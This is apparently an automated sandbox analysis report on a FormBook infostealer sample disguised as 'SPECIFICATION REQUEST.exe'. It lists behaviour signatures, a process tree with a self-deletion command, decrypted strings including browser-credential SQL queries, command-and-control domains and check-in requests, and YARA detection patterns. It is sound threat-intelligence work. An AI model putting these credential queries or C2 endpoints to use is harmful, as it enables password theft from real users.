Loading ...

Play interactive tourEdit tour

Analysis Report SPECIFICATION REQUEST.exe

Overview

General Information

Sample Name:SPECIFICATION REQUEST.exe
Analysis ID:344818
MD5:e7d7f8b02dd023f31b46e5bb265c7224
SHA1:95e91ec34debdc0e4817d90caca87897f4febe98
SHA256:fc534d33f183a321a447fef1fdef4c8a7fa78413cd15f93df13a39f0a8b9b2fe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SPECIFICATION REQUEST.exe (PID: 2952 cmdline: 'C:\Users\user\Desktop\SPECIFICATION REQUEST.exe' MD5: E7D7F8B02DD023F31B46E5BB265C7224)
    • SPECIFICATION REQUEST.exe (PID: 6104 cmdline: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe MD5: E7D7F8B02DD023F31B46E5BB265C7224)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 5964 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 2264 cmdline: /c del 'C:\Users\user\Desktop\SPECIFICATION REQUEST.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d51a", "CONFIG SIZE : 0xe5", "CONFIG OFFSET 0x1d61a", "URL SIZE : 30", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xe7084a1f", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715050", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012100", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01571", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "serabet.com", "galanggroup.com", "zweitmeinung-urologie.com", "damsalon.com", "binliwine.com", "lifeladderindia.com", "flyingwranchmanagement.com", "tripsandturns.com", "3headdesign.com", "aluminumfacade.com", "toprestau.com", "facetreatspa.com", "periodrescuekit.com", "dbaojian.com", "altinotokurtarma.com", "gkpelle.com", "loguslife.com", "treatse.com", "lghglzcnkx.net", "jawharabh.com", "planterboxgardener.com", "douyzqdsgl.com", "bestofselling.com", "carbeloy.com", "haok.net", "mymailtek.com", "itsabossthing.com", "peoplesdao.com", "bhumarealestate.com", "otugxixd.icu", "amongugadu.com", "jemadrekre.com", "nikber.com", "genomicsmaster.com", "firstbyphone.com", "arogyamfarms.com", "outletamigo.com", "musannafashion.com", "dtrixxx.com", "quickandeasygroup.com", "rawhustleapparel.com", "care.land", "charmingoneboutique.com", "xn--fllessang-g3a.com", "trendandjobs.online", "voxmediation.com", "alkawtherabudhabi.com", "peeledeye.com", "mcgillfamilylaw.com", "prokit.net", "my-safebaby.com", "bookatalia.com", "utilking.com", "jhondavid.com", "onpassivewithval.com", "gtelemed.com", "playfighterstube.com", "bestfreezerstorage.com", "kichnpro.com", "sanjeevanicreation.com", "allturdsmatter.com", "picklebarreldillivers.com", "clinversity.com", "keystogce.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.bistrolartichaut.com/gbr/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18409:$sqlite3step: 68 34 1C 7B E1
      • 0x1851c:$sqlite3step: 68 34 1C 7B E1
      • 0x18438:$sqlite3text: 68 38 2A 90 C5
      • 0x1855d:$sqlite3text: 68 38 2A 90 C5
      • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
      00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 18 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.SPECIFICATION REQUEST.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.SPECIFICATION REQUEST.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.SPECIFICATION REQUEST.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17609:$sqlite3step: 68 34 1C 7B E1
          • 0x1771c:$sqlite3step: 68 34 1C 7B E1
          • 0x17638:$sqlite3text: 68 38 2A 90 C5
          • 0x1775d:$sqlite3text: 68 38 2A 90 C5
          • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
          2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d51a", "CONFIG SIZE : 0xe5", "CONFIG OFFSET 0x1d61a", "URL SIZE : 30", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xe7084a1f", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715050", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012100", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01571", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for sampleShow sources
            Source: SPECIFICATION REQUEST.exeJoe Sandbox ML: detected
            Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: SPECIFICATION REQUEST.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
            Source: SPECIFICATION REQUEST.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Binary contains paths to debug symbolsShow sources
            Source: Binary string: wntdll.pdbUGP source: SPECIFICATION REQUEST.exe, 00000002.00000002.276237746.00000000010E0000.00000040.00000001.sdmp, wlanext.exe, 00000005.00000003.275791125.0000000000C70000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: SPECIFICATION REQUEST.exe, wlanext.exe
            Source: Binary string: wlanext.pdb source: SPECIFICATION REQUEST.exe, 00000002.00000002.276177204.0000000001090000.00000040.00000001.sdmp
            Source: Binary string: wlanext.pdbGCTL source: SPECIFICATION REQUEST.exe, 00000002.00000002.276177204.0000000001090000.00000040.00000001.sdmp
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 4x nop then pop esi
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop esi
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 34.102.136.180:80
            Source: global trafficHTTP traffic detected: GET /gbr/?ExlPdj=nhAt8Z8LHJDSJ38oPYfO+brGMc7hoePPt0UT7/rkXoSmXfJRpMQb8gX/3j1aoGmg1yg5&8p=FjoPdvK0HvW0 HTTP/1.1Host: www.toprestau.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /gbr/?8p=FjoPdvK0HvW0&ExlPdj=Iv22WWjBKqQBYt0GN1Q3exOP7ZZ1MpJKXobvjkOcU9p13P0mNXwz/8InMIRVOTv7wUKT HTTP/1.1Host: www.bistrolartichaut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /gbr/?ExlPdj=9T+hwsCOJ30KUotVp56F2oUIcU+kzNAqslJ8t+71ysezeCdq1RydECu9CMdgx5D0Nzh8&8p=FjoPdvK0HvW0 HTTP/1.1Host: www.firstbyphone.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
            Source: Joe Sandbox ViewASN Name: CSLDE CSLDE
            Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
            Source: C:\Windows\explorer.exeCode function: 3_2_06D26782 getaddrinfo,setsockopt,recv,
            Source: global trafficHTTP traffic detected: GET /gbr/?ExlPdj=nhAt8Z8LHJDSJ38oPYfO+brGMc7hoePPt0UT7/rkXoSmXfJRpMQb8gX/3j1aoGmg1yg5&8p=FjoPdvK0HvW0 HTTP/1.1Host: www.toprestau.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /gbr/?8p=FjoPdvK0HvW0&ExlPdj=Iv22WWjBKqQBYt0GN1Q3exOP7ZZ1MpJKXobvjkOcU9p13P0mNXwz/8InMIRVOTv7wUKT HTTP/1.1Host: www.bistrolartichaut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /gbr/?ExlPdj=9T+hwsCOJ30KUotVp56F2oUIcU+kzNAqslJ8t+71ysezeCdq1RydECu9CMdgx5D0Nzh8&8p=FjoPdvK0HvW0 HTTP/1.1Host: www.firstbyphone.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.planterboxgardener.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Joker.com HTTP Parking ServerDate: Wed, 27 Jan 2021 07:00:10 GMTLast-Modified: Wed, 27 Jan 2021 07:00:10 GMTCache-Control: no-store, no-cache, must-revalidate, post-check= 0, pre-check=0, max-age=3600Expires: Fri, 01 Jan 2016 00:00:00 GMTContent-Length: 1840Connection: Close
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234532898.00000000029B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
